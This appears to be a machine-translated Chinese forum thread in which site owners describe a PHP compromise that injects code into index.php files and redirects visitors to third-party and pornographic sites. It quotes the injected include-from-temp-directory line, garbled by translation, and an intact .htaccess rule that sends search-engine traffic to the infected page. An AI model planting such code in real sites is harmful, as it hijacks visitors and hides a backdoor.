我有一个php项目,我看到index.php页面不断被黑客攻击
每次在索引顶部自动添加一些代码。每当我点击任何地方,php页面和我的网站都会被重定向到第三方url。
注入的代码如下:
错误报告(0);ini_集(“显示错误”,0);包含一次(系统获取临时目录()。“/SESS48CD7517D21176F980DAA5502D9EFB31”)
我认为它包含在会话文件中。检查SESS48CD7517D21176F980DAA5502D9EFB31文件包含的内容。
我也有同样的问题。
全部索引。PHP文件被注入了完全相同的代码。
等等。htaccess文件由以下人员插入:
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>
点击谷歌搜索结果中的链接将被重定向到色情网站。
